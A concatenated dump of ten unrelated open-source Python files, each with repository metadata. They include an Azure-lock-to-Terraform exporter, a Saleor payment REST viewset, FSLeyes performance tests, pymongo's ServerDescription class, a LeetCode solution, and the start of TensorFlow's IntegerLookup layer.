c5a0c89f0d4e45233e61404230e9a8413c0fd471 | 4,779 | py | Python | scripts/azurerm_management_lock.py | recetasdevops/py-az2tf | e6932b64ce194f78724fb92078e2e833a44b50c7 | [
"MIT"
] | null | null | null | scripts/azurerm_management_lock.py | recetasdevops/py-az2tf | e6932b64ce194f78724fb92078e2e833a44b50c7 | [
"MIT"
] | null | null | null | scripts/azurerm_management_lock.py | recetasdevops/py-az2tf | e6932b64ce194f78724fb92078e2e833a44b50c7 | [
"MIT"
] | null | null | null | import uuid
def azurerm_management_lock(crf,cde,crg,headers,requests,sub,json,az2tfmess):
    """Fetch management locks for subscription *sub* from the Azure REST API
    and emit one Terraform .tf file per lock, plus shell scripts with the
    matching `terraform state rm` / `terraform import` commands.

    crf: resource-type filter; cde: debug flag; crg: optional resource-group
    filter.  Python 2 script.
    """
    # management locks
    tfp="azurerm_management_lock"
    azr=""
    if crf in tfp:
        # REST
        # # print "REST VNets"
        url="https://management.azure.com/subscriptions/" + sub + "/providers/Microsoft.Authorization/locks"
        params = {'api-version': '2017-04-01'}
        r = requests.get(url, headers=headers, params=params)
        azr= r.json()["value"]
        # State-removal and import helper scripts (appended to across runs).
        tfrmf="002-"+tfp+"-staterm.sh"
        tfimf="002-"+tfp+"-stateimp.sh"
        tfrm=open(tfrmf, 'a')
        tfim=open(tfimf, 'a')
        print "# " + tfp,
        count=len(azr)
        print count
        for j in range(0, count):
            name=azr[j]["name"]
            name=name.encode('utf-8', 'ignore')
            #loc=azr[j]["location"]
            id=azr[j]["id"]
            # Segment 4 of the id is the resource-group name; sanitise it
            # into a Terraform-safe identifier.
            rg=id.split("/")[4].replace(".","-").lower()
            if rg[0].isdigit(): rg="rg_"+rg
            rgs=id.split("/")[4]
            level=azr[j]["properties"]["level"]
            # The lock scope is everything before the Authorization provider.
            scope1=id.split("/Microsoft.Authorization")[0].rstrip("providers")
            scope=scope1.rstrip("/")
            sc=len(scope.split("/"))
            #print sc
            sn=scope.split("/")[sc-1].replace(" ","-").lower()
            sn=sn.replace(".","-")
            scope=scope.encode('utf-8', 'ignore')
            sn=sn.encode('utf-8', 'ignore')
            if crg is not None:
                if rgs.lower() != crg.lower():
                    continue # back to for
            if cde:
                print(json.dumps(azr[j], indent=4, separators=(',', ': ')))
            # Build a Terraform-safe resource name from the lock name.
            rname=name.replace(".","-")
            rname=rname.replace("[","-")
            rname=rname.replace("]","-")
            rname=rname.replace(" ","_")
            try:
                rname=rname.encode('utf-8', 'ignore')
            except UnicodeDecodeError:
                # Fall back to a random name when the original cannot be
                # encoded (Python 2 str/unicode mix).
                print('Problem with the name of this item: '+name)
                print('Please rename this item in the Azure Portal')
                rname=str(uuid.uuid4())
                rname=rname.encode('utf-8', 'ignore')
            try:
                prefix=tfp+"."+rg+'__'+rname+'__'+sn
            except UnicodeDecodeError:
                print('Problem with the scope name: '+scope)
                print('Please rename this item in the Azure Portal')
                sn=str(uuid.uuid4())
                sn=sn.encode('utf-8', 'ignore')
                prefix=tfp+"."+rg+'__'+rname+'__'+sn
            #prefix=tfp+"."+rg+'__'+rname
            # Write the HCL resource block for this lock.
            rfilename=prefix+".tf"
            fr=open(rfilename, 'w')
            fr.write('resource ' + tfp + ' "' + rg + '__' + rname + '__'+ sn + '" {\n')
            fr.write('\t name = "' + name + '"\n')
            fr.write('\t lock_level = "'+ level + '"\n')
            try:
                notes=azr[j]["properties"]["notes"]
                notes=notes.encode('utf-8', 'ignore')
                fr.write('\t notes = "'+ notes + '"\n')
            except KeyError:
                # notes is optional on a lock
                pass
            fr.write('\t scope = "'+ scope + '"\n')
            # tags block
            # tags block
            try:
                mtags=azr[j]["tags"]
                fr.write('tags = { \n')
                for key in mtags.keys():
                    tval=mtags[key]
                    fr.write(('\t "' + key + '"="' + tval + '"\n').encode('utf-8'))
                fr.write('}\n')
            except KeyError:
                pass
            #try:
            # mtags=azr[j]["tags"]
            #except:
            # mtags="{}"
            #tcount=len(mtags)-1
            #if tcount > 1 :
            # fr.write('tags = { \n')
            # print tcount
            # for key in mtags.keys():
            # tval=mtags[key]
            # fr.write(('\t "' + key + '"="' + tval + '"\n').encode('utf-8'))
            # #print(json.dumps(mtags, indent=4, separators=(',', ': ')))
            # fr.write('}\n')
            fr.write('}\n')
            fr.close() # close .tf file
            if cde:
                with open(rfilename) as f:
                    print f.read()
            # Append the matching state-rm / import commands.
            tfrm.write('terraform state rm '+tfp+'.'+rg+'__'+rname + '__' + sn + '\n')
            tfcomm='terraform import '+tfp+'.'+rg+'__'+rname + '__'+ sn + ' "'+id+'"\n'
            tfim.write('echo "importing ' + str(j) + ' of ' + str(count-1) + '"' + '\n')
            tfcomm=tfcomm.encode('utf-8', 'ignore')
            tfim.write(tfcomm)
        # end for
        tfrm.close()
        tfim.close()
    #end management locks
64cf437027809e4e6c8fe303d5a60bd2b5af8fb0 | 4,368 | py | Python | saleor/rest/views/payment.py | Chaoslecion123/Diver | 8c5c493701422eada49cbf95b0b0add08f1ea561 | [
"BSD-3-Clause"
] | null | null | null | saleor/rest/views/payment.py | Chaoslecion123/Diver | 8c5c493701422eada49cbf95b0b0add08f1ea561 | [
"BSD-3-Clause"
] | null | null | null | saleor/rest/views/payment.py | Chaoslecion123/Diver | 8c5c493701422eada49cbf95b0b0add08f1ea561 | [
"BSD-3-Clause"
] | null | null | null | from django.apps import apps
from rest_framework.filters import SearchFilter
from rest_framework.filters import OrderingFilter
from django_filters.rest_framework import DjangoFilterBackend
from rest_flex_fields import FlexFieldsModelViewSet
from saleor.rest.serializers import PaymentSerializer
__all__ = [
    'PaymentViewSet',
]
# Resolve the model through the app registry instead of a direct import so
# this module can be loaded before Django's model classes are ready.
Payment = apps.get_model(*'payment.Payment'.split())
class PaymentViewSet(FlexFieldsModelViewSet):
    """ViewSet for :model:`payment.Payment`

    `** Actions **`:

    create:
        Create a new `payment.Payment` instance.

    retrieve:
        Return the given `payment.Payment`.

    update:
        Update the given `payment.Payment`..

    delete:
        Delete the given `payment.Payment`, and return an empty response
        with HTTP 204 status code.

    list:
        Return a list of all the existing :model:`Payment`.
    """
    lookup_field = 'id'
    queryset = Payment.objects.all()
    serializer_class = PaymentSerializer
    filter_backends = [DjangoFilterBackend, SearchFilter, OrderingFilter, ]
    # Scaffolding: uncomment entries below to expose them as exact-match
    # filter parameters on the list endpoint.
    filter_fields = [
        # Fields
        # 'billing_address_1',
        # 'billing_address_2',
        # 'billing_city',
        # 'billing_city_area',
        # 'billing_company_name',
        # 'billing_country_area',
        # 'billing_country_code',
        # 'billing_email',
        # 'billing_first_name',
        # 'billing_last_name',
        # 'billing_postal_code',
        # 'captured_amount',
        # 'cc_brand',
        # 'cc_exp_month',
        # 'cc_exp_year',
        # 'cc_first_digits',
        # 'cc_last_digits',
        # 'charge_status',
        # 'checkout', # [checkout.Checkout]
        # 'created',
        # 'currency',
        # 'customer_ip_address',
        # 'extra_data',
        # 'gateway',
        # 'id',
        # 'is_active',
        # 'modified',
        # 'order', # [order.Order]
        # 'token',
        # 'total',
        # Reverse Fields
        # 'transactions',
    ]
    # Scaffolding: uncomment entries to include them in ?search= matching.
    search_fields = [
        # Fields
        # 'billing_address_1',
        # 'billing_address_2',
        # 'billing_city',
        # 'billing_city_area',
        # 'billing_company_name',
        # 'billing_country_area',
        # 'billing_country_code',
        # 'billing_email',
        # 'billing_first_name',
        # 'billing_last_name',
        # 'billing_postal_code',
        # 'captured_amount',
        # 'cc_brand',
        # 'cc_exp_month',
        # 'cc_exp_year',
        # 'cc_first_digits',
        # 'cc_last_digits',
        # 'charge_status',
        # 'checkout',
        # 'created',
        # 'currency',
        # 'customer_ip_address',
        # 'extra_data',
        # 'gateway',
        # 'id',
        # 'is_active',
        # 'modified',
        # 'order',
        # 'token',
        # 'total',
        # Reverse Fields
        # 'transactions',
    ]
    # Scaffolding: uncomment entries to allow them as ?ordering= keys.
    ordering_fields = [
        # Fields
        # 'billing_address_1',
        # 'billing_address_2',
        # 'billing_city',
        # 'billing_city_area',
        # 'billing_company_name',
        # 'billing_country_area',
        # 'billing_country_code',
        # 'billing_email',
        # 'billing_first_name',
        # 'billing_last_name',
        # 'billing_postal_code',
        # 'captured_amount',
        # 'cc_brand',
        # 'cc_exp_month',
        # 'cc_exp_year',
        # 'cc_first_digits',
        # 'cc_last_digits',
        # 'charge_status',
        # 'checkout',
        # 'created',
        # 'currency',
        # 'customer_ip_address',
        # 'extra_data',
        # 'gateway',
        # 'id',
        # 'is_active',
        # 'modified',
        # 'order',
        # 'token',
        # 'total',
        # Reverse Fields
        # 'transactions',
    ]
    # '__all__'
    # Default CRUD behaviour comes from FlexFieldsModelViewSet; override the
    # hooks below only when custom behaviour is needed.
    # def get_object(self):
    #     return super().get_object()
    # def create(self, request, *args, **kwargs):
    #     return super().create(request, *args, **kwargs)
    # def retrieve(self, request, *args, **kwargs):
    #     return super().retrieve(request, *args, **kwargs)
    # def update(self, request, *args, **kwargs):
    #     return super().update(request, *args, **kwargs)
    # def destroy(self, request, *args, **kwargs):
    #     return super().destroy(request, *args, **kwargs)
    # def list(self, request, *args, **kwargs):
    #     return super().list(request, *args, **kwargs)
9eb2c2d673f7caef76940c1376a9b8228c405177 | 421 | py | Python | core.py | WiGeeky/TelegramExportAnalyzer | 8d5f39271ef1b74fba32ae999763738426096a83 | [
"MIT"
] | 1 | 2021-02-21T16:02:51.000Z | 2021-02-21T16:02:51.000Z | core.py | WiGeeky/TelegramExportAnalyzer | 8d5f39271ef1b74fba32ae999763738426096a83 | [
"MIT"
] | null | null | null | core.py | WiGeeky/TelegramExportAnalyzer | 8d5f39271ef1b74fba32ae999763738426096a83 | [
"MIT"
] | null | null | null | import logging
import os
import json
logging.basicConfig(filename='output.log', level=logging.CRITICAL)
class Analyzer:
    """Context manager that loads a Telegram JSON export file.

    Entering the context opens ``file_path``, parses it as JSON and yields
    the parsed object; exiting closes the underlying file handle.
    """

    def __init__(self, file_path=None):
        # Path to the exported JSON file; may be supplied later by
        # assigning to ``file_path`` before entering the context.
        self.file_path = file_path

    def __enter__(self):
        self.file = open(self.file_path, 'r')
        try:
            self.obj = json.load(self.file)
        except Exception:
            # BUGFIX: if parsing fails the file handle used to leak;
            # close it before propagating the error.
            self.file.close()
            raise
        return self.obj

    def __exit__(self, exc_type, exc_value, traceback):
        # Renamed the first parameter from ``type`` (shadowed the builtin).
        self.file.close()
| 22.157895 | 66 | 0.648456 |
ffd79b5007b4878bb49c70e29a48667d7a8ae03c | 1,110 | py | Python | fsleyes/tests/test_performance.py | pauldmccarthy/fsleyes | 453a6b91ec7763c39195814d635257e3766acf83 | [
"Apache-2.0"
] | 12 | 2018-05-05T01:36:25.000Z | 2021-09-23T20:44:08.000Z | fsleyes/tests/test_performance.py | pauldmccarthy/fsleyes | 453a6b91ec7763c39195814d635257e3766acf83 | [
"Apache-2.0"
] | 97 | 2018-05-05T02:17:23.000Z | 2022-03-29T14:58:42.000Z | fsleyes/tests/test_performance.py | pauldmccarthy/fsleyes | 453a6b91ec7763c39195814d635257e3766acf83 | [
"Apache-2.0"
] | 6 | 2017-12-09T09:02:00.000Z | 2021-03-05T18:55:13.000Z | #!/usr/bin/env python
#
# test_performance.py -
#
# Author: Paul McCarthy <pauldmccarthy@gmail.com>
#
from fsleyes.tests import run_cli_tests, discretise
# One FSLeyes command line per row; run_cli_tests renders each scene.  The
# {{...}} expression is evaluated with the names supplied via `extras`
# (here, `discretise` pre-bins the image for the label overlay test).
cli_tests = """
3d.nii.gz
3d.nii.gz -ot mask -t 4000 10000
3d.nii.gz -ot mip
{{discretise('3d.nii.gz', 500)}} -ot label
dti
dti/dti_V1 -ot rgbvector
dti/dti_V1 -ot linevector
sh -ot sh
mesh_l_thal.vtk -mc 1 0 0
"""

# Evaluation namespace for the {{...}} expressions embedded in cli_tests.
extras = {'discretise' : discretise}
def add_prefix(prefix):
    """Return ``cli_tests`` with *prefix* prepended to every test line."""
    prefixed = (prefix + line for line in cli_tests.strip().split('\n'))
    return '\n'.join(prefixed)
def test_performance_p1_ortho():
    """Render all scenes at performance level 1 in the ortho view."""
    run_cli_tests('test_performance', add_prefix('-p 1 -s ortho '),
                  extras=extras)
def test_performance_p2_ortho():
    """Render all scenes at performance level 2 in the ortho view."""
    run_cli_tests('test_performance', add_prefix('-p 2 -s ortho '),
                  extras=extras)
def test_performance_p1_lightbox():
    """Render all scenes at performance level 1 in the lightbox view."""
    run_cli_tests('test_performance', add_prefix('-p 1 -s lightbox '),
                  extras=extras)
def test_performance_p2_lightbox():
    """Render all scenes at performance level 2 in the lightbox view."""
    run_cli_tests('test_performance', add_prefix('-p 2 -s lightbox '),
                  extras=extras)
| 21.346154 | 59 | 0.7 |
d2efa23258cc94e74e6d818c4e6dcd48ea707f52 | 36 | py | Python | core/entitiy/__init__.py | ryanolee/pager-duty-sync | 1fd88634e461b5db647d856bc6b59f990944685e | [
"MIT"
] | null | null | null | core/entitiy/__init__.py | ryanolee/pager-duty-sync | 1fd88634e461b5db647d856bc6b59f990944685e | [
"MIT"
] | 2 | 2020-09-27T18:19:17.000Z | 2021-06-29T09:21:04.000Z | core/entitiy/__init__.py | ryanolee/pager-duty-sync | 1fd88634e461b5db647d856bc6b59f990944685e | [
"MIT"
] | null | null | null | from .OnCallShift import OnCallShift | 36 | 36 | 0.888889 |
63c7cb6b5b7747ee15793bf87865f2ab501fcc84 | 226 | py | Python | administration/models.py | AhteshamSid/College_school_management_system | a8504708ea2f347d18d4ac59198f29d05c0374d2 | [
"MIT"
] | null | null | null | administration/models.py | AhteshamSid/College_school_management_system | a8504708ea2f347d18d4ac59198f29d05c0374d2 | [
"MIT"
] | null | null | null | administration/models.py | AhteshamSid/College_school_management_system | a8504708ea2f347d18d4ac59198f29d05c0374d2 | [
"MIT"
] | null | null | null | from django.db import models
class Designation(models.Model):
    """A staff designation/title record used by the administration app."""

    # Human-readable designation name; uniqueness enforced at the DB level.
    name = models.CharField(max_length=100, unique=True)
    # Creation date, set once when the row is first inserted.
    date = models.DateField(auto_now_add=True)

    def __str__(self):
        return self.name
| 22.6 | 57 | 0.690265 |
ee261ac96cb09741c624efdf517c4aa0b7f43e5d | 1,193 | py | Python | p784m/letter_case_permutation.py | l33tdaima/l33tdaima | 0a7a9573dc6b79e22dcb54357493ebaaf5e0aa90 | [
"MIT"
] | 1 | 2020-02-20T12:04:46.000Z | 2020-02-20T12:04:46.000Z | p784m/letter_case_permutation.py | l33tdaima/l33tdaima | 0a7a9573dc6b79e22dcb54357493ebaaf5e0aa90 | [
"MIT"
] | null | null | null | p784m/letter_case_permutation.py | l33tdaima/l33tdaima | 0a7a9573dc6b79e22dcb54357493ebaaf5e0aa90 | [
"MIT"
] | null | null | null | from typing import List
class Solution:
    """LeetCode 784: generate every letter-case variant of a string."""

    def letterCasePermutationV1(self, S: str) -> List[str]:
        """Recursive backtracking: branch on each alphabetic character."""
        results = []

        def walk(prefix: str, pos: int) -> None:
            # Digits have no case variants; copy them through directly.
            while pos < len(S) and S[pos].isdigit():
                prefix += S[pos]
                pos += 1
            if pos == len(S):
                results.append(prefix)
                return
            # Lowercase branch first so output order matches input order.
            walk(prefix + S[pos].lower(), pos + 1)
            walk(prefix + S[pos].upper(), pos + 1)

        walk("", 0)
        return results

    def letterCasePermutationV2(self, S: str) -> List[str]:
        """Iterative expansion: extend all partial results one char at a time."""
        partials = [""]
        for ch in S:
            if ch.isalpha():
                variants = (ch.lower(), ch.upper())
                partials = [p + v for p in partials for v in variants]
            else:
                partials = [p + ch for p in partials]
        return partials
# TESTS
CASES = [
    ("a1b2", ["a1b2", "a1B2", "A1b2", "A1B2"]),
    ("3z4", ["3z4", "3Z4"]),
    ("12345", ["12345"]),
    ("0", ["0"]),
]
for S, expected in CASES:
    solver = Solution()
    actual = solver.letterCasePermutationV1(S)
    print("Letter case permutation of", S, "->", actual)
    # Both implementations must agree with the expected output.
    assert actual == expected
    assert expected == solver.letterCasePermutationV2(S)
04e9dbfe77b46dddd534616fd70880e301656bc3 | 6,335 | py | Python | stackoverflow/venv/lib/python3.6/site-packages/pymongo/server_description.py | zhi-xianwei/learn_python3_spider | a3301f8112e4ded25c3578162db8c6a263a0693b | [
"MIT"
] | 9,953 | 2019-04-03T23:41:04.000Z | 2022-03-31T11:54:44.000Z | stackoverflow/venv/lib/python3.6/site-packages/pymongo/server_description.py | W4LKURE/learn_python3_spider | 98dd354a41598b31302641f9a0ea49d1ecfa0fb1 | [
"MIT"
] | 44 | 2019-05-27T10:59:29.000Z | 2022-03-31T14:14:29.000Z | stackoverflow/venv/lib/python3.6/site-packages/pymongo/server_description.py | W4LKURE/learn_python3_spider | 98dd354a41598b31302641f9a0ea49d1ecfa0fb1 | [
"MIT"
] | 2,803 | 2019-04-06T13:15:33.000Z | 2022-03-31T07:42:01.000Z | # Copyright 2014-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Represent one server the driver is connected to."""
from bson import EPOCH_NAIVE
from pymongo.server_type import SERVER_TYPE
from pymongo.ismaster import IsMaster
from pymongo.monotonic import time as _time
class ServerDescription(object):
    """Immutable representation of one server.

    :Parameters:
      - `address`: A (host, port) pair
      - `ismaster`: Optional IsMaster instance
      - `round_trip_time`: Optional float
      - `error`: Optional, the last error attempting to connect to the server
    """

    # __slots__ keeps instances small; topology monitoring creates a fresh
    # ServerDescription for every server on every heartbeat.
    __slots__ = (
        '_address', '_server_type', '_all_hosts', '_tags', '_replica_set_name',
        '_primary', '_max_bson_size', '_max_message_size',
        '_max_write_batch_size', '_min_wire_version', '_max_wire_version',
        '_round_trip_time', '_me', '_is_writable', '_is_readable',
        '_ls_timeout_minutes', '_error', '_set_version', '_election_id',
        '_cluster_time', '_last_write_date', '_last_update_time')

    def __init__(
            self,
            address,
            ismaster=None,
            round_trip_time=None,
            error=None):
        self._address = address
        if not ismaster:
            # No ismaster response yet: an empty IsMaster reports server
            # type Unknown and conservative defaults for all limits.
            ismaster = IsMaster({})

        # Cache every field of the ismaster response as a private
        # attribute so this description stays immutable afterwards.
        self._server_type = ismaster.server_type
        self._all_hosts = ismaster.all_hosts
        self._tags = ismaster.tags
        self._replica_set_name = ismaster.replica_set_name
        self._primary = ismaster.primary
        self._max_bson_size = ismaster.max_bson_size
        self._max_message_size = ismaster.max_message_size
        self._max_write_batch_size = ismaster.max_write_batch_size
        self._min_wire_version = ismaster.min_wire_version
        self._max_wire_version = ismaster.max_wire_version
        self._set_version = ismaster.set_version
        self._election_id = ismaster.election_id
        self._cluster_time = ismaster.cluster_time
        self._is_writable = ismaster.is_writable
        self._is_readable = ismaster.is_readable
        self._ls_timeout_minutes = ismaster.logical_session_timeout_minutes
        self._round_trip_time = round_trip_time
        self._me = ismaster.me
        # Monotonic timestamp of when this description was created.
        self._last_update_time = _time()
        self._error = error

        if ismaster.last_write_date:
            # Convert from datetime to seconds.
            delta = ismaster.last_write_date - EPOCH_NAIVE
            self._last_write_date = delta.total_seconds()
        else:
            self._last_write_date = None

    @property
    def address(self):
        """The address (host, port) of this server."""
        return self._address

    @property
    def server_type(self):
        """The type of this server."""
        return self._server_type

    @property
    def server_type_name(self):
        """The server type as a human readable string.

        .. versionadded:: 3.4
        """
        return SERVER_TYPE._fields[self._server_type]

    @property
    def all_hosts(self):
        """List of hosts, passives, and arbiters known to this server."""
        return self._all_hosts

    @property
    def tags(self):
        return self._tags

    @property
    def replica_set_name(self):
        """Replica set name or None."""
        return self._replica_set_name

    @property
    def primary(self):
        """This server's opinion about who the primary is, or None."""
        return self._primary

    @property
    def max_bson_size(self):
        return self._max_bson_size

    @property
    def max_message_size(self):
        return self._max_message_size

    @property
    def max_write_batch_size(self):
        return self._max_write_batch_size

    @property
    def min_wire_version(self):
        return self._min_wire_version

    @property
    def max_wire_version(self):
        return self._max_wire_version

    @property
    def set_version(self):
        return self._set_version

    @property
    def election_id(self):
        return self._election_id

    @property
    def cluster_time(self):
        return self._cluster_time

    @property
    def election_tuple(self):
        # (set_version, election_id) pair, compared as a unit when
        # deciding whether an election is stale.
        return self._set_version, self._election_id

    @property
    def me(self):
        return self._me

    @property
    def logical_session_timeout_minutes(self):
        return self._ls_timeout_minutes

    @property
    def last_write_date(self):
        # Seconds since the epoch (converted from the ismaster response
        # in __init__), or None if the server did not report one.
        return self._last_write_date

    @property
    def last_update_time(self):
        return self._last_update_time

    @property
    def round_trip_time(self):
        """The current average latency or None."""
        # This override is for unittesting only!
        if self._address in self._host_to_round_trip_time:
            return self._host_to_round_trip_time[self._address]

        return self._round_trip_time

    @property
    def error(self):
        """The last error attempting to connect to the server, or None."""
        return self._error

    @property
    def is_writable(self):
        return self._is_writable

    @property
    def is_readable(self):
        return self._is_readable

    @property
    def mongos(self):
        return self._server_type == SERVER_TYPE.Mongos

    @property
    def is_server_type_known(self):
        return self.server_type != SERVER_TYPE.Unknown

    @property
    def retryable_writes_supported(self):
        """Checks if this server supports retryable writes."""
        return (
            self._ls_timeout_minutes is not None and
            self._server_type in (SERVER_TYPE.Mongos, SERVER_TYPE.RSPrimary))

    @property
    def retryable_reads_supported(self):
        """Checks if this server supports retryable reads."""
        # Retryable reads require wire version 6+ (MongoDB 3.6+).
        return self._max_wire_version >= 6

    # For unittesting only. Use under no circumstances!
    _host_to_round_trip_time = {}
| 29.882075 | 79 | 0.67056 |
5ef75cbc2d294b7b19070c5cdd9d213f823af358 | 1,749 | py | Python | go/apps/subscription/tests/test_definition.py | lynnUg/vumi-go | 852f906c46d5d26940bd6699f11488b73bbc3742 | [
"BSD-3-Clause"
] | null | null | null | go/apps/subscription/tests/test_definition.py | lynnUg/vumi-go | 852f906c46d5d26940bd6699f11488b73bbc3742 | [
"BSD-3-Clause"
] | null | null | null | go/apps/subscription/tests/test_definition.py | lynnUg/vumi-go | 852f906c46d5d26940bd6699f11488b73bbc3742 | [
"BSD-3-Clause"
] | null | null | null | from go.apps.subscription.definition import ConversationDefinition
from go.apps.subscription.metrics import SubscribedMetric, UnsubscribedMetric
from go.base.tests.helpers import GoDjangoTestCase
from go.vumitools.metrics import MessagesReceivedMetric, MessagesSentMetric
from go.vumitools.tests.helpers import VumiApiHelper
class TestSubscriptionConversationDefinition(GoDjangoTestCase):
    """Checks the metrics exposed by the subscription conversation."""

    def setUp(self):
        self.vumi_helper = self.add_helper(VumiApiHelper(is_sync=True))
        self.user_helper = self.vumi_helper.get_or_create_user()
        # Two handlers -> subscribed/unsubscribed metrics for two campaigns.
        conv_config = {
            'handlers': [
                {'campaign_name': 'campaign-1'},
                {'campaign_name': 'campaign-2'},
            ],
        }
        wrapped_conv = self.user_helper.create_conversation(
            u'subscription', config=conv_config)
        self.conv = wrapped_conv.c
        self.conv_def = ConversationDefinition(self.conv)

    def test_metrics_retrieval(self):
        [m1, m2, m3, m4, m5, m6] = self.conv_def.get_metrics()
        expectations = [
            (m1, 'messages_sent', MessagesSentMetric),
            (m2, 'messages_received', MessagesReceivedMetric),
            (m3, 'campaign-1.subscribed', SubscribedMetric),
            (m4, 'campaign-2.subscribed', SubscribedMetric),
            (m5, 'campaign-1.unsubscribed', UnsubscribedMetric),
            (m6, 'campaign-2.unsubscribed', UnsubscribedMetric),
        ]
        for metric, expected_name, expected_cls in expectations:
            self.assertEqual(metric.metric.name, expected_name)
            self.assertTrue(isinstance(metric, expected_cls))
| 41.642857 | 77 | 0.708405 |
40bf92cbd9543db273c6cb1cc19647144ec476f9 | 14,852 | py | Python | tensorflow/python/keras/layers/preprocessing/integer_lookup.py | jonnymiyagi/tensorflow | b347508e0decd7ac3ec8ae8c9ab53f7a117a6124 | [
"Apache-2.0"
] | 1 | 2021-03-16T00:50:36.000Z | 2021-03-16T00:50:36.000Z | tensorflow/python/keras/layers/preprocessing/integer_lookup.py | yuxunzhi/tensorflow | bb562131d4bce6bf69188a52e570ef9376726fe4 | [
"Apache-2.0"
] | null | null | null | tensorflow/python/keras/layers/preprocessing/integer_lookup.py | yuxunzhi/tensorflow | bb562131d4bce6bf69188a52e570ef9376726fe4 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Keras string lookup preprocessing layer."""
# pylint: disable=g-classes-have-attributes
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.keras.engine import base_preprocessing_layer
from tensorflow.python.keras.layers.preprocessing import index_lookup
from tensorflow.python.keras.layers.preprocessing import table_utils
from tensorflow.python.util.tf_export import keras_export
@keras_export("keras.layers.experimental.preprocessing.IntegerLookup", v1=[])
class IntegerLookup(index_lookup.IndexLookup):
  """Maps integers from a vocabulary to integer indices.

  This layer translates a set of arbitrary integers into an integer output via
  a table-based vocabulary lookup.

  The vocabulary for the layer can be supplied on construction or learned via
  `adapt()`. During `adapt()`, the layer will analyze a data set, determine the
  frequency of individual integer values, and create a vocabulary from them. If
  the vocabulary is capped in size, the most frequent values will be used to
  create the vocabulary and all others will be treated as out-of-vocabulary
  (OOV).

  There are two possible output modes for the layer.
  When `output_mode` is "int", input values are converted to their index in the
  vocabulary (an integer).
  When `output_mode` is "binary", "count", or "tf-idf", input values
  are encoded into an array where each dimension corresponds to an element in
  the vocabulary.

  The vocabulary can optionally contain a mask value as well as an OOV value
  (which can optionally occupy multiple indices in the vocabulary, as set
  by `num_oov_indices`).
  The position of these values in the vocabulary is fixed. When `output_mode`
  is "int", the vocabulary will begin with the mask value at index 0, followed
  by OOV indices, followed by the rest of the vocabulary. When `output_mode` is
  "binary", "count", or "tf-idf" the vocabulary will begin with OOV indices and
  instances of the mask value will be dropped.

  Args:
    max_values: The maximum size of the vocabulary for this layer. If None,
      there is no cap on the size of the vocabulary. Note that this size
      includes the OOV and mask values. Default to None.
    num_oov_indices: The number of out-of-vocabulary values to use. If this
      value is more than 1, OOV inputs are modulated to determine their OOV
      value. If this value is 0, OOV inputs will map to -1 when `output_mode`
      is "int" and are dropped otherwise. Defaults to 1.
    mask_value: A value that represents masked inputs. When `output_mode` is
      "int", the value is included in vocabulary and mapped to index 0. In
      other output modes, the value will not appear in the vocabulary and
      instances of the mask value in the input will be dropped. If set to None,
      no mask term will be added. Defaults to 0.
    oov_value: Only used when `invert` is True. The value to return for OOV
      indices. Defaults to -1.
    vocabulary: An optional list of values, or a path to a text file containing
      a vocabulary to load into this layer. The file should contain one value
      per line. If the list or file contains the same value multiple times, an
      error will be thrown.
    invert: Only valid when `output_mode` is "int". If True, this layer will
      map indices to vocabulary items instead of mapping vocabulary items to
      indices. Default to False.
    output_mode: Specification for the output of the layer. Defaults to "int".
      Values can be "int", "binary", "count", or "tf-idf" configuring the layer
      as follows:
        "int": Return the raw integer indices of the input values.
        "binary": Outputs a single int array per sample, of either vocab_size
          or max_values size, containing 1s in all elements where the value
          mapped to that index exists at least once in the sample.
        "count": Like "binary", but the int array contains a count of the
          number of times the value at that index appeared in the sample.
        "tf-idf": As "binary", but the TF-IDF algorithm is applied to find the
          value in each value slot.
    pad_to_max_values: Only applicable when `output_mode` is "binary", "count",
      or "tf-idf". If True, the output will have its feature axis padded to
      `max_values` even if the number of unique values in the vocabulary is
      less than max_values, resulting in a tensor of shape [batch_size,
      max_values] regardless of vocabulary size. Defaults to False.
    sparse: Boolean. Only applicable when `output_mode` is "binary", "count",
      or "tf-idf". If True, returns a `SparseTensor` instead of a dense
      `Tensor`. Defaults to False.

  Examples:

  **Creating a lookup layer with a known vocabulary**

  This example creates a lookup layer with a pre-existing vocabulary.

  >>> vocab = [12, 36, 1138, 42]
  >>> data = tf.constant([[12, 1138, 42], [42, 1000, 36]])  # Note OOV values
  >>> layer = IntegerLookup(vocabulary=vocab)
  >>> layer(data)
  <tf.Tensor: shape=(2, 3), dtype=int64, numpy=
  array([[2, 4, 5],
         [5, 1, 3]])>

  **Creating a lookup layer with an adapted vocabulary**

  This example creates a lookup layer and generates the vocabulary by analyzing
  the dataset.

  >>> data = tf.constant([[12, 1138, 42], [42, 1000, 36]])
  >>> layer = IntegerLookup()
  >>> layer.adapt(data)
  >>> layer.get_vocabulary()
  [0, -1, 42, 1138, 1000, 36, 12]

  Note how the mask value 0 and the OOV value -1 have been added to the
  vocabulary. The remaining values are sorted by frequency (1138, which has
  2 occurrences, is first) then by inverse sort order.

  >>> data = tf.constant([[12, 1138, 42], [42, 1000, 36]])
  >>> layer = IntegerLookup()
  >>> layer.adapt(data)
  >>> layer(data)
  <tf.Tensor: shape=(2, 3), dtype=int64, numpy=
  array([[6, 3, 2],
         [2, 4, 5]])>

  **Lookups with multiple OOV indices**

  This example demonstrates how to use a lookup layer with multiple OOV
  indices. When a layer is created with more than one OOV index, any OOV
  values are hashed into the number of OOV buckets, distributing OOV values in
  a deterministic fashion across the set.

  >>> vocab = [12, 36, 1138, 42]
  >>> data = tf.constant([[12, 1138, 42], [37, 1000, 36]])
  >>> layer = IntegerLookup(vocabulary=vocab, num_oov_indices=2)
  >>> layer(data)
  <tf.Tensor: shape=(2, 3), dtype=int64, numpy=
